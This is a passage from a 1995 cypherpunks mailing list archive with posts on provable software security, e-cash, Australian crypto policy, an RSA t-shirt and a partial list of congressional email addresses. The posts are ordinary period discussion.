jMvmb9njXiWT3OAUtrpO/IrqxoZEL2yCf3KsOInHavMsuZbbayBRePMHG32KFPe9
r5kvpUAI+tOegRQ7grUZwBBxqpGVwsINSb1qhM7/Kla5Z2QQHzUQDTvQ1Q0orbZi
/JHMJ2aBFUg=
=fnb6
-----END PGP SIGNATURE-----
 
____           Robert A. Hayden      <=> hayden@krypton.mankato.msus.edu
\  /__     Finger for Geek Code Info <=>    Finger for PGP Public Key
 \/  /           -=-=-=-=-=-                      -=-=-=-=-=-
   \/        http://krypton.mankato.msus.edu/~hayden/Welcome.html

-----BEGIN GEEK CODE BLOCK-----
Version: 3.0
GED/J d-- s:++>: a-- C++(++++) ULU++ P+! L++ E---- W+(-) N++++ K+++ w---
O- M+ V-- PS++>$ PE++>$ Y++ PGP++ t- 5+++ X++ R+++>$ tv+ b+ DI+++ D+++
G++++>$ e++ h r-- y++**
------END GEEK CODE BLOCK------




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: fc@all.net (Dr. Frederick B. Cohen)
Date: Tue, 1 Aug 95 16:24:08 PDT
To: Matthew.Sheppard@Comp.VUW.AC.NZ (Matthew James Sheppard)
Subject: Re: Provably Correct Crypto?
In-Reply-To: <199508012259.KAA16027@bats.comp.vuw.ac.nz>
Message-ID: <9508012317.AA25184@all.net>
MIME-Version: 1.0
Content-Type: text


...
> Frederick can you please tell me why I should belive thttpd is secure.
> I don't accept the ability to compile it myself as evidence and I
> don't accept a summary of that source written in english prose on the
> basis that it has no hard link what so ever to the source.  It was
> also written by the authors of thttpd.

The reason to believe that thttpd fulfills the claims it makes is
provided in some detail in the white paper on our server (see what's new
under http://all.net).  A slightly more detailed version has been
submitted for a journal article, and hopefully will appear in a year or
two.

Certainly compiling it yourself would not in any way help you assert its
security, however it would help you assure that the compiled version (which
we don't provide on-line) is not an altered executable.

I would detail the full set of claims here, but this is not the proper
forum for general security issues.  Of course if there is popular
support, I would be glad to... Instead, I will briefly outline it here:

The basic reason that thttpd can be verified to fulfill the claimed
security properties relate to some well thought-of and mathemtically
proven theories about information flow.  Specifically:

	we have shown that information coming from the client cannot
	flow to the server except in its effects of sending the requested
	file (if it exists, is properly owned, and is properly protected
	for access by remote users) and logging the request in the log
	file generated by the program.  If no information can flow from
	the client to the server data, the client cannot cause
	corruption of the server (subject to various details not
	included here).

	we have shown that the server is a limited function program (i.e.,
	does not have Turing capability), and that therefore no general
	purpose operations can be performed as a result of any external input.

	we have shown that the variables and structures are confined so
	as to have no unspecified side effects, and that therefore there
	are no effects other than those stated in the description of the
	program.

	we have also shown some other stuf you might be interested in.

The next logical question is why those are worthwhile things to show,
and I won't get into these details here without further prompting.

> You should find this argument hauntingly familiar.

I welcome your questions about "why" as I always do.  I think that
this is a very important question and one worth following up.

> You state that crypto should be poved correct and suggest a technique
> otherwise known as formal specification.  I agree, pgp should have
> been written in Z-specs.  If you take a course in formal specification
> you will soon see the intractability of the technique wrt large
> systems.

I didn't say that.  Perhaps you should review what I said before
characterizing it.

> I'm sorry, the english prose your team writes holds no extra formal
> credibility over trust.  It demonstrates more study - but has not
> proven security.

I have shown (not yet proven) certain things.  A graduate student is now
working on trying to prove the various properties I believe to be of
interest in an automatic theorum prover he is working on.  I believe
that these things are worth showing (and proving), but you may certainly
feel free to disagree with these contentions.

> If you want prople on this list to repeat after you "I cannot be
> certain there is no compromising bugs or backdoors in X" Then I will
> go out on a limb and say everyone here will agree if system X is
> sufficiently large.

I don't believe I ever asked anyone on this list to repeat anything. 
All I did was ask questions and respond to responses to my questions.

-- 
-> See: Info-Sec Heaven at URL http://all.net
Management Analytics - 216-686-0090 - PO Box 1480, Hudson, OH 44236



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 1 Aug 95 17:02:54 PDT
To: cypherpunks@toad.com
Subject: QIK_san
Message-ID: <199508020002.UAA16604@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   8-1-95. W$Japer:


   "Your Home Computer Will Soon Be Your Banker and Broker."

      The first on-line banking transaction will be a historic
      moment not unlike the first automobile sale or the first
      commercial airline flight. It will signal a commercially
      viable use of a new technology that may ultimately
      eliminate what until now we have considered the retail
      aspects of banking, stock brokerage and more. The
      implications are profound.

      The promise is electronic access to all financial
      transactions at substantially lower cost. One's personal
      computer can, in essence, become an in-home bank branch,
      brokerage outlet and financial planner.

      For example, with Intuit's software and with its union
      with American Express, Smith Barney and 17 large banks,
      consumers will be able use one link for the first time
      to access traditional banking, credit- and charge-card
      services, brokerage services, financial planning and
      more.

      The effect on the banking and brokerage business and
      their employees is going to be profound. The retail
      sales forces of banks and brokerage houses may shrink
      substantially, as may the ranks of financial planners.
      The number of bank and brokerage buildings may also
      shrink.


   QIK_san











From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Tue, 1 Aug 95 17:31:39 PDT
To: cypherpunks@toad.com
Subject: Pat Robertson Fears E-cash?
Message-ID: <199508020031.UAA21712@pipe2.nyc.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   A Foxhole-atheist swears Pat Robertson said last night that 
his
   new book warns of a "digital cash society" and massive
   theft by cyber-criminals. Did any believer hear this, or 
know if
   this is what he prognosticates for e-cash bedevilment?










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 1 Aug 95 20:36:37 PDT
To: cypherpunks@toad.com
Subject: anonymity review in law journal
Message-ID: <199508020334.UAA09787@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



Hi everyone, someone tipped me off to a law review article by 
Anne Branscomb entitled Anonymity, Autonomy, and Accountability: 
Challenges to the First Amendment in Cyberspaces  104 Yale L F 1639.
I have not seen this myself or noticed it mentioned here
but it might be an interesting read for anyone
who has access to it, and useful as a footnote in someone's 
paper, web filling, pointer for reporters, fish wrapping, or
bird cage lining. (as Alfred E. Neuman might note)




~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
\  / ~/ |\| | | |> |  : : : : : : Vladimir Z. Nuri : : : : <vznuri@netcom.com>
 \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Tue, 1 Aug 95 11:47:15 PDT
To: cypherpunks@toad.com
Subject: Re: punk's not dead!
Message-ID: <v01510100ac42f21a3124@[193.74.217.18]>
MIME-Version: 1.0
Content-Type: text/plain


>hello? i'am new on this stuff, help me!

Sorry, this a mailing list for Country & Western music.

--
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Tue, 1 Aug 95 20:51:16 PDT
To: cypherpunks@toad.com
Subject: "The Future does not Compute"
Message-ID: <199508020349.UAA11272@netcom15.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain


I am reading "the Future does not Compute" by Stephen L. Talbott.
I wonder if anyone else has gotten into this. Its a fairly interesting
read that is some of the typical trendy reactionism against the 
utopianism of various visionaires promoting cyberspace and
the bit revolution. Talbott however seems to be awfully vague in his criticisms.
They seem to amount to, "I'm not sure what the net is missing,
but it lacks something crucial that is  the essence of our humanity".
It reminds me of the various criticisms against AI by Penrose
and Searle, "the technology fundamentally lacks, and will continue
to lack, that inexpressible something that makes us human which
is impossible to define or characterize."

One quote drew my attention. He quoted an anonymous participant
on an "irvc-l" discussion list:

 While I'm not forecasting Utopia, I think networks of the future
 will be the most incredibly egalitarian technology ever invented.
 It will transform our entire societies. Imagine that homeless people
 or single parent children can "interconnect" with anybody who
 is willing to talk to them in the *world*. The possibilities are rather
 dazzling. Sure, there might be even cyberspatial outcasts, but the point
 is that we will be doing *at least* as well as we are now, which is not
 something to "write home" about.

The writing seems vaguely familiar, yet I can't quit pin it down. I
think I might have been on that list in the time period, and I am trying 
to figure out the authorship. (And am a bit annoyed at Talbott for not giving 
proper credit.) Surely one of the visionaires like Gilmore, Barlow, 
Rotenberg, or somesuch. Its an interesting theme; I think it may have been
the same author who said, quoted by Talbott, "the net is fundamentally
democratizing and leveling." If anyone recognizes that quote, maybe
drop me a line. Talbott uses this theme of whether "the Net is
inherently democratizing and leveling" as a counterpoint thought
to the chapter, even at times the whole book.

I am inclined to agree with Talbott in general, by the way, and I think 
the quotes are overstated. In my opinion networks are like all other
technologies: they bring out the best and worst in human beings,
beyond what was known previously. In this way technology is like
a magnifying glass on our virtues and vices. We may find the
things that work about our society magnified, but at the same
time our failings become expanded and exacerbated as well.

That is what I like about great technology. It is not necessarily 
an ends in itself, but a way of learning about the essence of our human
psychology. It forces us to confront what we find uplifting
and what we find despicable, and removes the possibility of
denial.

It seems to me that networks are inherently democratic in
a society that craves democracy, but I don't really believe
that there is fundamentally something egalitarian or democratic
about certain kinds of technology. Actually, I think that
is true in general if *everyone* is given access to the techology,
but the problem is that some governments can use the technology
for themselves as a powerful instrument of control by the elites
over the downtrodden.

To me Talbott has a very good point, that we should be thoughtful
in the creation of new technology, and examine our axioms as
to whether we can even achieve what we are attempting to 
derive from it in the long run.

The Thoreauian  quote, "men have become the tools
of their tools" comes to mind repeatedly when I read Talbott.


~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^~^
\  / ~/ |\| | | |> |  : : : : : : Vladimir Z. Nuri : : : : <vznuri@netcom.com>
 \/ ./_.| | \_/ |\ | : : : : : : ftp://ftp.netcom.com/pub/vz/vznuri/home.html




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Ed Carp [khijol SysAdmin]" <erc@khijol.intele.net>
Date: Tue, 1 Aug 95 20:36:40 PDT
To: "Robert A. Hayden" <hayden@krypton.mankato.msus.edu>
Subject: Re: US vs Overseas Banks
In-Reply-To: <Pine.ULT.3.91.950801185038.7953A-100000@krypton.mankato.msus.edu>
Message-ID: <Pine.3.89.9508012150.E12592-0100000@khijol>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Aug 1995, Robert A. Hayden wrote:

> It's interesting to note that where I am (Mankato, Minnesota) I was able 
> to open a checking account with NO ID what so ever.  I just wrote down a 
> name and address (which is a P.O. box, BTW) and the next wee I had a box 
> of checks (free) and a ATM card (also free).
> 
> Of course, this bank has been criticized for being somewhat lax on who 
> they give accounts to, but the point still stands.  I could have been 
> anybody, and give any false address.  *shrug*

Why should they give a damn who you are?  IMO, it's none of their 
business.  Hell, they're making $$$ on *your* deposits, it's time they 
stopped being such shits about it.
--
Ed Carp, N7EKG    			Ed.Carp@linux.org, ecarp@netcom.com
801/534-8857 voicemail			801/460-1883 digital pager
Finger ecarp@netcom.com for PGP 2.5 public key		an88744@anon.penet.fi

Q.	What's the trouble with writing an MS-DOS program to emulate Clinton?
A.	Figuring out what to do with the other 639K of memory.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Andrew.Spring@ping.be (Andrew Spring)
Date: Tue, 1 Aug 95 12:42:01 PDT
To: cypherpunks@toad.com
Subject: Australia next to ban PGP
Message-ID: <199508011940.VAA05285@ping1.ping.be>
MIME-Version: 1.0
Content-Type: text/plain


> Path:
ping.be!Belgium.EU.net!EU.net!howland.reston.ans.net!tank.news.pipex.net!pipex!sunsite.doc.ic.ac.uk!lyra.csx.cam.ac.uk!rja14
> From: rja14@cl.cam.ac.uk (Ross Anderson)
> Newsgroups:
alt.security.pgp,alt,politics.datahighway,aus.legal,aus.net.news,sci.crypt
> Subject: Australia next to ban PGP
> Date: 1 Aug 1995 17:53:50 GMT
> Organization: U of Cambridge Computer Lab, UK
> Lines: 57
> Message-ID: <3vlpne$cks@lyra.csx.cam.ac.uk>
> NNTP-Posting-Host: nene.cl.cam.ac.uk
> Xref: ping.be alt.security.pgp:9699 sci.crypt:4852
> 
> Australia's proposed crypto policy:
> 
> (1)     Banks will get key escrow
> 
> (2)     Other Australian residents will be forced to use weak crypto
> 
> Source: talk by Steve Orlowski, Assistant Director, Australian attorney 
> general's department, given at the Cryptography Policy and Algorithms 
> Conference, Queensland University of Technology, last month.
> 
> p 34: `the needs of the majority of users of the infrastructure for
>       privacy and smaller financial transactions can be met by lower 
>       level encryption which could withstand a normal but not 
>       sophisticated attack against it. Law enforcement agencies could 
>       develop the capability to mount such sophisticated attacks. 
>       Criminals who purchased the higher level encryption products 
>       would immediately attract attention to themselves.'
> 
> He mentioned that his department considered itself a suitable repository
> for the government central decrypting unit, which would decrypt traffic 
> for local police forces. He also wants to escrowed keys for banks and 
> other organisations allowed to use strong crypto. 
> 
> Centralising the wiretap capability with the AG is represented as a useful
> safeguard against abuse of power by local police forces. It would be
> presented as a `data recovery' facility in order to reassure the voters.
> 
> Centralisation will enable the AG to acquire the capability to use ``more 
> sophisticated techniques in circumstances where the key cannot, for 
> whatever reason, be recovered from escrow''.
> 
> So the technical parameters would appear to be: 40 bit keys for the 
> masses, 56-bit escrowed keys for the banks, and a Wiener machine sitting
> in Orlowski's office. Belt, braces and string.
> 
> Curiously enough, he quotes a `Review of long Term Cost Effectiveness
> of Telecommunications Interception' as saying that ``Encryption by 
> targets of their communications (both voice and data) is not considered
> as a problem for TI at present in Australia'' and goes on to say that
> ``there has been comparatively little market for voice encryption 
> products, although they have been readily available''. 
> 
> He even produces some good arguments for the EFF, such as that much of
> the intelligence comes from the call log data and from calls to third 
> parties such as airlines and hotels which are not encrypted.
> 
> He also says that the OECD countries will hold a meeting on National 
> Cryptography Policies later this year. While at the conference, I found
> out that a classified meeting took place this March in Germany between 
> the signals intelligence agencies of the developed countries, plus
> Australia and South Africa, at which the assembled spooks agreed to
> press their governments to bring in escrow and/or weak crypto.
> 
> Australia seems rather eager to lick Uncle Sam's boots on this issue. 
> I wonder what the payoff was?
> 
> Ross

-- 
Thank you VERY much!  You'll be getting a Handsome Simulfax Copy of your 
OWN words in the mail soon (and My Reply).
<Andrew.Spring@ping.be> PGP Print: 0529 C9AF 613E 9E49  378E 54CD E232 DF96
   Thank you for question, exit left to Funway.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 1 Aug 95 19:01:10 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: a hole in PGP
In-Reply-To: <9508011212.AA17103@all.net>
Message-ID: <9508020201.AA15198@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Dr. Frederick B. Cohen writes:
> It's probably my fault for not asking them in the way you are used to
> hearing them, or maybe we are all over-sensitive about our work.

Since I've had no involvement in the writing of PGP and RFC 1750, I don't 
think I'm being sensitive about my work :]

[...]
> And if enough of those on this list feel that this discussion and my postings
> are too commercial or too abusive to take, I am certain that Brent will send
> you a free copy of his Fred filter.

Nah, we're not into third-party censorship here. As for myself, I intend to
keep reading what you write here. Your manner is not a legitimate reason to 
ignore the value of (some of) your words. 

-Futplex <futplex@pseudonym.com>



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jon Lasser <jlasser@rwd.goucher.edu>
Date: Tue, 1 Aug 95 19:08:57 PDT
To: John Young <jya@pipeline.com>
Subject: Re: Pat Robertson Fears E-cash?
In-Reply-To: <199508020031.UAA21712@pipe2.nyc.pipeline.com>
Message-ID: <Pine.SUN.3.91.950801220141.3608B-100000@rwd.goucher.edu>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Aug 1995, John Young wrote:

>    A Foxhole-atheist swears Pat Robertson said last night that 
> his
>    new book warns of a "digital cash society" and massive
>    theft by cyber-criminals. Did any believer hear this, or 
> know if
>    this is what he prognosticates for e-cash bedevilment?

I saw him on the 700 club about a year ago WRT this topic.  As far as I 
can recall, the above accurately sums up his position.

(The reason he really cares has to do with that "Number of the Beast" 
stuff in Revelations)

Jon
------------------------------------------------------------------------------
Jon Lasser                <jlasser@rwd.goucher.edu>            (410) 494-3253 
          Visit my home page at http://www.goucher.edu/~jlasser/
  You have a friend at the NSA: Big Brother is watching. Finger for PGP key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Robert A. Rosenberg" <hal9001@panix.com>
Date: Tue, 1 Aug 95 19:10:04 PDT
To: cypherpunks@toad.com
Subject: Re: Zimmermann legal fund
Message-ID: <v02130509ac4480f56434@[166.84.254.3]>
MIME-Version: 1.0
Content-Type: text/plain


At 17:57 7/30/95, Ed Carp [khijol SysAdmin] wrote:
>When I lived in California, I banked at Security Pacific, then changed
>over my account to BofA.  When I left the bay area, I closed my account,
>not knowing that someone had sat on a check for $120 - I thought it was me
>just entering an ATM receipt twice (as I do from time to time).  So,
>someone from a place called ChexSystems sends me a letter, saying "well,
>you had a check go through and the bank paid it, please pay us."  So, I
>send them the $120 or whatever it was.

How old was the check when it was presented (and how long was it from the
check's date until you had closed the account). If the check was stale then
you have a valid gripe about the bank's behavior. I've dealt in situations
where people are collecting checks which are going to be "stale" before
they are submitted for processing yet there is no request to post-date the
check nor setting up of an escrow account to hold/clear the money until it
can be turned over to the correct owner (they collect voting fees for a
convention where the winner gets the money but the holder of the election
is the one who is being sent the check to sit-on [for up to 6 months] until
the winner can be handed the stack of checks - There is a claim that the
holder of the election can not open a segregation/escrow account due to
bank rules or procedures).






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: futplex@pseudonym.com (Futplex)
Date: Tue, 1 Aug 95 19:13:40 PDT
To: cypherpunks@toad.com (Cypherpunks Mailing List)
Subject: Re: Provably Correct Crypto?
In-Reply-To: <199508012149.AA26006@tyrell.net>
Message-ID: <9508020213.AA15346@cs.umass.edu>
MIME-Version: 1.0
Content-Type: text/plain


Phil writes:
> Or perhaps just rewrite the program to use plain arrays instead of
> pointers. ;-)

How about Java-PGP ?  ;)

-Futplex



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: adwestro@ouray.cudenver.edu (Alan Westrope)
Date: Tue, 1 Aug 95 21:13:39 PDT
To: cypherpunks@toad.com
Subject: Re: NRC Panel, Law Enforcement questions
In-Reply-To: <199508020325.XAA158645@tequesta.gate.net>
Message-ID: <wdvHwkkAsWXI084yn@ouray.cudenver.edu>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

On Tue, 01 Aug 1995, liberty@gate.net (Jim Ray) wrote:

> I wonder, and perhaps my kind friend Hadmut can help me here, if there is
> an English translation of any and all Nazi-era German laws/regs regarding 
> cryptography.

I'm not Hadmut, don't play him on TV, and am not known for being kind,
but I recently learned that, "In 1940, Nazi Germany ordered all books
on cryptology withdrawn from circulation." -- from historian David
Kahn's statement before the House Government Information and Individual
Rights Subcommittee, March 20, 1980.


Alan Westrope                  <awestrop@nyx10.cs.du.edu>
__________/|-,                 <adwestro@ouray.cudenver.edu>
   (_)    \|-'                  2.6.2 public key: finger / servers
PGP 0xB8359639:  D6 89 74 03 77 C8 2D 43   7C CA 6D 57 29 25 69 23

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMB75vVRRFMq4NZY5AQH2mgP/VJ6p5Iw0HLgpEPvMO8nWLtPh8MRhEBWJ
rckqqpGWyDv8o4bdbaIhwOlUcZEulI4LBt6/ola1VMvuWigFlrh3eXqD2Ojk+L3G
Wac9D07Vg8dOWwBaa2y13XNbICDfwX2PBvGda6KagSCXaiElfDqZulTCex3jh39D
G3clzxi2bv4=
=ieoE
-----END PGP SIGNATURE-----




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Mike Bailey <bailey@computek.net>
Date: Tue, 1 Aug 95 20:17:52 PDT
To: WOOD@VAX2.ROCKHURST.EDU
Subject: Re: commerical busters
In-Reply-To: <01HTK2WJPWYQ001IQN@VAX2.ROCKHURST.EDU>
Message-ID: <Pine.SUN.3.91.950801221937.3989K-100000@bambam.computek.net>
MIME-Version: 1.0
Content-Type: text/plain


On Tue, 1 Aug 1995 WOOD@VAX2.ROCKHURST.EDU wrote:

>  
>  ON: 31-JUL-1995 20:14:46.10, dan@netmarket.com wrote:
>  
> > At 8:50 PM 07/31/95, Patrick May wrote:
> > 
> > >     My dim memories from a project I did for Sony a couple of years
> > >ago are that commercials are separated by a fixed number of black
> > >frames and some, at least, have tracking information encoded so that
> > >advertisers can monitor how often they are played.  I'll try to dig up
> > >more info.
> > 
> > From: dfitzpat@interserv.com
> >       Wednesday July 26, 1995 -- ShopTalk
> > 
> > - --
> > 
> > NEW VCRs TAKE ON COMMERCIALS POINT-BLANK
> > 
> >                         By Jonathan Takiff
> >                Philadelphia Daily News Staff Writer
> > 
> > 
> > Already besieged by Washington politicians over the content of TV
> > programming (and threats of a show-blocking chip), television
> > broadcasters are about to be hit with another whammy.  This time it's
> > VCRs that automatically blank out commercials.
> > 
> > <snip>
> > 
> > $$$$ $$$$$ $$$$
> > -----BEGIN PGP SIGNATURE-----
> > Version: 2.6.2
> > 
> > iQCVAwUBMB193KZKaCr9f/gtAQFa5AP/ZEmtSM/hSXb6zcFHDmv9Me0thtAqqCxZ
> > 7COYgWxuLkl78+y/INpFKW861mrNig1UlO8Q+vDImKK3qUmTS1tzRWNIH9XVyYtA
> > pJ05g/Z/WKUPx17jd2no9oRqut4bziLa4iMj59B/4nxAhIjEtE5TZFP6okCQ1HGm
> > qbFhOteJavc=
> > =Opny
> > -----END PGP SIGNATURE-----
> > 
>                                                             dan


I believe that they did something like this in Japan several years ago ...
I believe they sensed changes in the power output of the audio and also
looks for changes in the color outputs. The last I read on said they had
limited sucess with their methods.

-Mike

**************************************************************************
*       Mike Bailey                     (hm)214-252-3915                 * 
*       AT&T Capital Corporation.       (wk)214-456-4510                 *
*       email bailey@computek.net       host bambam.computek.net         *
*   "Remember you can tune a piano but you can't tuna fish -Joe Walsh"   *
*                http://www.computek.net/public/bailey                   *
**************************************************************************





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Penny <penny@tyrell.net>
Date: Tue, 1 Aug 95 21:17:16 PDT
To: cypherpunks@toad.com
Subject: Munition (RSA) Tshirt Testimonial
Message-ID: <199508020412.AA17824@tyrell.net>
MIME-Version: 1.0
Content-Type: text/plain



I got my RSA tshirt this week. It looks good! 
Features:

  - Way cool black with white lettering

  - Famous RSA code in 5 lines of perl code on front.

  - Same text represented in CODE 128 barcode
    (several bar code lines look kind of smudgy,
    I doubt that the bar code could actually be
    read by a scanner, but it looks cool!).

  - Text on back: "Warning this Tshirt is a munition, 
    ITAR section..."
     
I have worn the shirt out 2 times this week. Unfortunately
no one seemed to be impressed by it :-( 

Maybe I will go browsing for a Pentium system at CompUSA with
it on this week end and see if it draws any comment/notice.

I got my shirt from:

      dhenson@itsnet.com (Don Henson)

      Don Henson, Managing Director (PGP Key ID = 0X03002DC9)
      West El Paso Information Network (WEPIN)
      Check out The WEPIN Store at URL:
      http://colossus.net/wepinsto/wshome.html

Order it one or two sizes larger than you think that you need 
for a comfortable fit!

Cordially,

[-------------------------------------------------------------------------]
[  Public pgp-key: email penny@tyrell.net with subject as 'send pgp-key'  ]
[     My opinions are mine. I have scored 90% on the the Turing Test.     ]
[                   Alan Penny, penny@tyrell.net                          ]




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: liberty@gate.net (Jim Ray)
Date: Tue, 1 Aug 95 20:27:06 PDT
To: gnu@toad.com
Subject: RE:NRC Panel, Law Enforcement questions
Message-ID: <199508020325.XAA158645@tequesta.gate.net>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

Nice questions, John. To bring executive-branch accountability to a level
more closely approaching absolute zero, the FBI might want a FOIA backlog
of +8 years instead of "only" 5, but from what little I know of FOIA; its 
exceptions, combined with a hostile judiciary (led by Justice Scalia) are 
swallowing most of it anyway, as embarrassment _obviously_ hurts vital U.S.
National Security Interests...[Note: IANAL, and I *am* a bit sarcastic!]

I wonder, and perhaps my kind friend Hadmut can help me here, if there is
an English translation of any and all Nazi-era German laws/regs regarding 
cryptography. As I [dimly] recall, Enigma was born as a private enterprise
and the patent was only later taken over by government and classified after
it was offered for sale to businesses (without much luck). These laws, if
they exist, might make for interesting reading in side-by-side comparison 
with either Sen. Grassley's latest proposals, or with anything regarding 
cryptography coming from our paranoid FBI director.
JMR


-----BEGIN PGP SIGNATURE-----
Version: 2.6.2
Comment: Freedom isn't Freeh

iQCVAwUBMB7vC21lp8bpvW01AQE9WQP7BxH6fBTRyxLX3Sw46oYSCbTHKukVC5Hc
Z9nNSC35bazNa5QBCnr7pZjFUBmGXTzs4/NE2uyPbp34d3ojVJrgta9n+y8DX5uD
yY4oMignyHGMPscac8OEkUmN+5T5gG1UKYpWv80Qt8sGfpyw3HCHOyE2YYFjpZ1y
X+/ZDHvogj8=
=dJ3T
-----END PGP SIGNATURE-----
Regards, Jim Ray

"The people will again respect the law when the law again respects
the will of the people." Jim Ray, Campaign '92
------------------------------------------------------------------------
PGP key Fingerprint  51 5D A2 C3 92 2C 56 BE  53 2D 9C A1 B3 50 C9 C8 
Key id. #  E9BD6D35
------------------------------------------------------------------------
Support the Phil Zimmermann (Author of PGP) Legal Defense Fund! 
email:  zldf@clark.net or visit http://www.netresponse.com/zldf
________________________________________________________________________





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Nathan Zook <nzook@bga.com>
Date: Tue, 1 Aug 95 21:54:25 PDT
To: cypherpunks@toad.com
Subject: Software Glitch FYI (fwd)
Message-ID: <Pine.3.89.9508012300.A23934-0100000@maria.bga.com>
MIME-Version: 1.0
Content-Type: text/plain




---------- Forwarded message ----------
Date: Tue, 1 Aug 95 01:55 EST
From: Dr. Linda D. Thompson - American Justice Federation <lindat@iquest.net>
To: aen!news@iquest.net
Subject: Software Glitch FYI

A Congressman's aid called me today to explain that if you send email to all
the Congressmen's offices at one time, the software at their end causes each
Congressman to receive 50 copies.

Please be sure everyone is aware of this glitch.

To prevent 50 copies from being sent to each Congressman, it is necessary to
break the mailing list into 5-10 addresses at a time.

Every list I've ever received of Congressional Emails has annoying spaces
and formats, so my list doesn't have that.  It can be copied directly into a
nickname box in Eudora or to a Bcc: list on a message.

senator@boxer.senate.gov
senator_brown@brown.senate.gov,
sen_dodd@dodd.senate.gov,
senator_lieberman@lieberman.senate.gov,
joe_biden@biden.senate.gov,
senator_coverdell@coverdell.senate.gov,
tom_harkin@harkin.senate.gov,
chuck_grassley@grassley.senate.gov,
larry_craig@craig.senate.gov,
dirk_kempthorne@kempthorne.senate.gov,
senator@simon.senate.gov,
senator@moseley-braun.senate.gov,
wendell_ford@ford.senate.gov,
senator@breaux.senate.gov,
senator@johnston.senate.gov,
senator@kennedy.senate.gov,
john_kerry@kerry.senate.gov,
senator@mikulski.senate.gov,
senator@levin.senate.gov,
mail_grams@grams.senate.gov,
senator@wellstone.senate.gov,
john_ashcroft@ashcroft.senate.gov,
max@baucus.senate.gov,
conrad_burns@burns.senate.gov,
bob@kerrey.senate.gov,
mailbox@gregg.senate.gov,
opinion@smith.senate.gov,
senator@bradley.senate.gov,
senator_Bingaman@bingaman.senate.gov,
senator_domenici@domenici.senate.gov,
senator_reid@reid.senate.gov,
senator_dewine@dewine.senate.gov,
nickles@rpc.senate.gov,
lugar@iquest.net
senator_chafee@chafee.senate.gov,
senator@hollings.senate.gov,
tom_daschle@daschle.senate.gov,
larry_pressler@pressler.senate.gov,
senator_frist@frist.senate.gov,
senator@hutchison.senate.gov,
senator_robb@robb.senate.gov,
senator@warner.senate.gov,
senator_leahy@leahy.senate.gov,
vermont@jeffords.senate.gov,
senator_Gorton@gorton.senate.gov,
russell_feingold@feingold.senate.gov,
senator@rockefeller.senate.gov,
everett@hr.house.gov,
budmail@hr.house.gov,
sbachus@hr.house.gov,
jdickey@hr.house.gov,
edpastor@hr.house.gov,
dcaucus@hr.house.gov,
woolsey@hr.house.gov,
gmiller@hr.house.gov,
sfnancy@hr.house.gov,
talk2tom@hr.house.gov,
petemail@hr.house.gov,
annagram@hr.house.gov,
tellnorm@hr.house.gov,
zoegram@hr.house.gov,
samfarr@hr.house.gov,
george@hr.house.gov,
andrea22@hr.house.gov,
tellbuck@hr.house.gov,
jharman@hr.house.gov,
tucker96@hr.house.gov,
housesst@hr.house.gov,
rpackard@hr.house.gov,
skaggs@hr.house.gov,
schaefer@hr.house.gov,
bozrah@hr.house.gov,
cshays@hr.house.gov,
delaware@hr.house.gov,
kthurman@hr.house.gov,
cstearns@hr.house.gov,
canady@hr.house.gov,
pdeutsch@hr.house.gov,
hastings@hr.house.gov,
jlinder@hr.house.gov,
georgia6@hr.house.gov,
saxby@hr.house.gov,
ga10@hr.house.gov,
runderwo@hr.house.gov,
brush@hr.house.gov,
luisg@hr.house.gov,
hfawell@hr.house.gov,
dhastert@hr.house.gov,
durbin@hr.house.gov,
johnhost@hr.house.gov,
emailpat@hr.house.gov,
edky01@hr.house.gov,
mward2@hr.house.gov,
bunning4@hr.house.gov,
torkma06@hr.house.gov,
jmoakley@hr.house.gov,
cardin@hr.house.gov,
tellhoek@hr.house.gov,
congehlr@hr.house.gov,
davecamp@hr.house.gov,
repsmith@hr.house.gov,
chrysler@hr.house.gov,
lrivers@hr.house.gov,
jconyers@hr.house.gov,
